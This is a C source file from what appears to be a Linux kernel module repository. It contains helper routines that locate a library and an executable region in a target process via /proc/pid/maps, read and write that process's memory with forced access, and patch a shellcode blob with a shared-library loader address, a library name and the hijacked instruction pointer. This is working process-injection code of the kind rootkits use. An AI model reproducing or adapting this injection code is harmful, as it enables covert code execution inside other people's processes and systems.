-
Notifications
You must be signed in to change notification settings - Fork 20
/
utils.c
177 lines (157 loc) · 4.53 KB
/
utils.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
#include "utils.h"
#include <linux/mm.h>
#include <linux/sched/mm.h>
#include <linux/slab.h>
#include <linux/gfp.h>
#include "file.h"
#include "so_shellcode_loader.h"
void* find_lib_address(pid_t pid, char* library) {
struct file* fp;
char filename[30];
char data[850];
char* line;
unsigned long addr;
int offset = 0;
char* substring;
int size = 0;
sprintf(filename, "/proc/%d/maps", pid);
fp = file_open(filename, O_RDONLY, 0);
if(NULL == fp) {
return NULL;
}
while(true) {
size = file_read(fp, offset, data, 850);
if (0 == size) {
file_close(fp);
return NULL;
}
substring = strstr(data, "\n");
if (NULL == substring) {
substring = data + size;
}
size = substring - data;
line = kmalloc(size + 1, GFP_KERNEL);
strncpy(line, data, size);
sscanf(line, "%lx-%*x %*s %*s %*s %*d", &addr);
if(strstr(line, library) != NULL) {
kfree(line);
break;
}
kfree(line);
offset += size + 1;
}
file_close(fp);
return (void*)addr;
}
void* find_executable_space(pid_t pid) {
struct file* fp;
char filename[30];
char data[850];
char* line;
unsigned long addr;
char str[20];
char perms[5];
int offset = 0;
char* substring;
int size = 0;
sprintf(filename, "/proc/%d/maps", pid);
fp = file_open(filename, O_RDONLY, 0);
if(NULL == fp) {
return NULL;
}
while(true) {
size = file_read(fp, offset, data, 850);
if (0 == size) {
file_close(fp);
return NULL;
}
substring = strstr(data, "\n");
if (NULL == substring) {
substring = data + size;
}
size = substring - data;
line = kmalloc(size + 1, GFP_KERNEL);
strncpy(line, data, size);
sscanf(line, "%lx-%*x %s %*s %s %*d", &addr, perms, str);
kfree(line);
if(strstr(perms, "x") != NULL) {
break;
}
offset += size + 1;
}
file_close(fp);
return (void*)addr;
}
ssize_t mem_rw(struct task_struct *task, char *buf, size_t count, loff_t *ppos, int write) {
struct mm_struct *mm = task->mm;
unsigned long addr = *ppos;
ssize_t copied;
char *page;
unsigned int flags;
if (!mm)
return 0;
page = (char *)get_zeroed_page(GFP_KERNEL);
if (!page)
return -ENOMEM;
copied = 0;
if (!atomic_inc_not_zero(&mm->mm_users))
goto free;
/* Maybe we should limit FOLL_FORCE to actual ptrace users? */
flags = FOLL_FORCE;
if (write)
flags |= FOLL_WRITE;
while (count > 0) {
int this_len = min_t(int, count, PAGE_SIZE);
if (write && NULL == memcpy(page, buf, this_len)) {
copied = -EFAULT;
break;
}
this_len = access_process_vm(task, addr, page, this_len, flags);
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}
if (!write && NULL == memcpy(buf, page, this_len)) {
copied = -EFAULT;
break;
}
buf += this_len;
addr += this_len;
copied += this_len;
count -= this_len;
}
*ppos = addr;
mmput(mm);
free:
free_page((unsigned long) page);
return copied;
}
ssize_t mem_read(struct task_struct* task, char *buf, size_t count, unsigned long pos) {
loff_t ppos = pos;
return mem_rw(task, buf, count, &ppos, 0);
}
ssize_t mem_write(struct task_struct* task, char *buf, size_t count, unsigned long pos) {
loff_t ppos = pos;
return mem_rw(task, buf, count, &ppos, 1);
}
void* get_shellcode(size_t* shellcode_size, struct pt_regs* registers, unsigned long so_library_name, unsigned long load_so_function, bool came_from_syscall) {
void* shellcode_patched;
unsigned long ip;
if (came_from_syscall) {
ip = registers->ip - 2;
}
else {
ip = registers->ip;
}
*shellcode_size = (unsigned long)end_of_shellcode - (unsigned long)shellcode;
if (0 >= *shellcode_size){
return NULL;
}
shellcode_patched = kmalloc(*shellcode_size, GFP_KERNEL);
memcpy(shellcode_patched, shellcode, *shellcode_size);
memcpy(shellcode_patched + 39, (void*)&load_so_function, sizeof(unsigned long));
memcpy(shellcode_patched + 49, (void*)&so_library_name, sizeof(unsigned long));
memcpy(shellcode_patched + 99, (void*)&ip , sizeof(unsigned long));
return shellcode_patched;
}